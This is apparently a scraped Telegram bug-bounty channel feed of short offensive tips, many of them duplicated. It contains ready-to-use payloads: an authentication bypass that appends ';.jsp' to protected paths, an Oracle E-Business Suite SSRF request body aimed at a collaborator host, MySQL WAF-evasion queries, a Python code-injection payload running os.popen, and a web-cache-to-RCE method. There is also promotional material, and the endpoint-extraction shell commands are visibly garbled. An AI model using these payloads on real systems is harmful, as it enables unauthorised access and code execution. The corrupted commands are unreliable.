Extract all endpoints from a JS File and take your bug ๐
- Method one
- Method two
#infosec #cybersec #bugbountytips
- Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu- Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt#infosec #cybersec #bugbountytips
โค14๐1
Hey Hunter's,
Darkshadow here back again!
โจAuthentication bypass method:
โ Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Tip:
1. Find sensitive path from js file which need authentication.
2. Try to find endpoints which end with a extension like: .php, .jsp, .shtml etc.
3. Simply Fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml
If any of these gives 200ok check manually. And might it's works!
Don't forget to show your loves guy's โค๏ธ
Darkshadow here back again!
โจAuthentication bypass method:
โ Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload ๐๐ผ ;.jsp
Tip:
1. Find sensitive path from js file which need authentication.
2. Try to find endpoints which end with a extension like: .php, .jsp, .shtml etc.
3. Simply Fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml
If any of these gives 200ok check manually. And might it's works!
Don't forget to show your loves guy's โค๏ธ
โค21๐4
๐จCVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite
โกDorks
HUNTER : https://product.name="DotNetNuke"
โกDorks
HUNTER : https://product.name="DotNetNuke"
Hey Hunter,
DarkShadow is here back again, dropping an another SSRF!
Oracle E-Business Suite (12.2.3-12.2.14) SSRF POC
Method: POST
Path: /OA_HTML/configurator/UiServlet
Parameter: return_url
Body:
If you guy's Love to read then show your loveโค๏ธ
#bugbountytips #ssrf
DarkShadow is here back again, dropping an another SSRF!
Oracle E-Business Suite (12.2.3-12.2.14) SSRF POC
Method: POST
Path: /OA_HTML/configurator/UiServlet
Parameter: return_url
Body:
redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
<initialize>
<param name="init_was_saved">anything</param>
<param name="return_url">https://BURP_COLLABORATOR</param>
<param name="ui_def_id">0</param>
<param name="config_effective_usage_id">0</param>
<param name="ui_type">Applet</param>
</initialize>
If you guy's Love to read then show your loveโค๏ธ
#bugbountytips #ssrf
โค25๐ฅ3
Grab all the GF Patterns from different Repositories at one shot !! ๐ฅ
*Link* : https://github.com/thecybertix/GF-Patterns
*Link* : https://github.com/thecybertix/GF-Patterns
GitHub
GitHub - thecybertix/GF-Patterns: This repository contains all the GF-Patterns Repositories. All we have to do is just to run theโฆ
This repository contains all the GF-Patterns Repositories. All we have to do is just to run the given Shell File and it's Done !! - thecybertix/GF-Patterns
๐3
Nov 7: Mon & Fri, 8:00 PM IST
Nov 8: Sat & Sun, 9:00 PM IST
Please open Telegram to view this post
VIEW IN TELEGRAM
WhatsApp.com
Brut Security
Business Account
โค2
โค2
โก๏ธOutdated but Helpful Some MySQL tricks to break some #WAFs out there. โ๏ธ by @BRuteLogic
#infosec #cybersec #bugbountytips
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`#infosec #cybersec #bugbountytips
โค17
Hey Hunter's,
Darkshadow here back again, and Just Look at the wild thing:
User 1 Password:
protecting_my_accounts_with_long_readable_passwords123
User 2 Password:
protecting_my_accounts_with_long_readable_passwords456
If the web application using bcrypt hash algorithm then both user can login each other using there different password!
Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes (73th, 74th ...) are ignored!
So if the any users first 72 bytes are same (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.
#bugbountytips
Darkshadow here back again, and Just Look at the wild thing:
User 1 Password:
protecting_my_accounts_with_long_readable_passwords123
User 2 Password:
protecting_my_accounts_with_long_readable_passwords456
If the web application using bcrypt hash algorithm then both user can login each other using there different password!
Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes (73th, 74th ...) are ignored!
So if the any users first 72 bytes are same (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.
#bugbountytips
๐ฟ10โค5
Hey Hunter's,
Darkshadow here back again, with another unique RCE method!
๐RCE via Python Code Injection:
โ POC:
Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ
Don't forget to follow me guys x.com/darkshadow2bd
Darkshadow here back again, with another unique RCE method!
๐RCE via Python Code Injection:
โ POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}
Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ
Don't forget to follow me guys x.com/darkshadow2bd
โค19๐ฑ9๐ฟ1
๐ Tool of the Day: IPING โ IP Lookup & Detection
๐ Need quick IP facts? IPING lets you lookup any IP or domain
๐ Instant, accurate, and totally free โ returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐งญ Try it now: https://www.iping.cc/
#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐ Need quick IP facts? IPING lets you lookup any IP or domain
๐ Instant, accurate, and totally free โ returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐งญ Try it now: https://www.iping.cc/
#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐ฅ3โค2๐1๐1๐ฟ1
๐The ultimate 403 Bypass wordlists and tester notes by JHaddix
๐ฑ Github: ๐ Link
---------------------------------------------------------
๐ ๐๐๐ฏ๐๐ฅ ๐๐ฉ ๐๐จ๐ฎ๐ซ ๐๐ฒ๐๐๐ซ๐๐๐ ๐๐๐ฆ๐! ๐ฅ
๐ brutsec.com
๐ฑ ๐๐๐ฅ๐๐ ๐ซ๐๐ฆ: t.iss.one/brutsecurity
๐ผ ๐: x.com/brutsecurity
๐ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐๐๐ฆ๐๐ฉ: topmate.io/saumadip/1391531
๐ ๐๐จ๐ฎ๐ซ๐ฌ๐ ๐๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐๐ง๐ญ: wa.link/brutsecurity
โญ ๐๐ข๐ค๐ ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ ๐ ๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐๐จ๐ข๐ง, ๐๐ฎ๐๐ฌ๐๐ซ๐ข๐๐ & ๐๐๐ง๐ ๐๐ญ๐๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!
#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
๐ฑ Github: ๐ Link
---------------------------------------------------------
๐ ๐๐๐ฏ๐๐ฅ ๐๐ฉ ๐๐จ๐ฎ๐ซ ๐๐ฒ๐๐๐ซ๐๐๐ ๐๐๐ฆ๐! ๐ฅ
๐ brutsec.com
๐ฑ ๐๐๐ฅ๐๐ ๐ซ๐๐ฆ: t.iss.one/brutsecurity
๐ผ ๐: x.com/brutsecurity
๐ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐๐๐ฆ๐๐ฉ: topmate.io/saumadip/1391531
๐ ๐๐จ๐ฎ๐ซ๐ฌ๐ ๐๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐๐ง๐ญ: wa.link/brutsecurity
โญ ๐๐ข๐ค๐ ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ ๐ ๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐๐จ๐ข๐ง, ๐๐ฎ๐๐ฌ๐๐ซ๐ข๐๐ & ๐๐๐ง๐ ๐๐ญ๐๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!
#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
โค9
โกSubDomain Grabber - A bug bounty tool to download, unzip, and clean subdomains from Chaos ProjectDiscovery.
๐จConverts *.abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.
โ https://github.com/MuhammadWaseem29/SubDomain-Grabber
๐จConverts *.abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.
โ https://github.com/MuhammadWaseem29/SubDomain-Grabber
โค6๐ณ1
๐ฐ๏ธ Discover IPING โ Your Go-To IP Intelligence Tool
๐ก IPING helps you uncover whatโs behind any IP address in seconds.
๐ From location and ASN to proxy status and risk level โ all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
๐ Explore now: https://www.iping.cc/
๐ก IPING helps you uncover whatโs behind any IP address in seconds.
๐ From location and ASN to proxy status and risk level โ all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
๐ Explore now: https://www.iping.cc/
โค5๐ฅ3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ16โค6๐1
Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! Itโs really very intresting, Post coming Soon.
what do you think Web Cache to RCE possible or not?
Yes! Itโs really very intresting, Post coming Soon.
๐ฑ20๐ซก6โค5
Hey Hunter's,
Darkshadow here back again, dropping a really very interesting Method.
๐Web cache to RCE!๐
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
โ Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
Darkshadow here back again, dropping a really very interesting Method.
๐Web cache to RCE!๐
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
โ Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
๐ฅ20๐ฟ8๐ฑ4๐2โค1๐ข1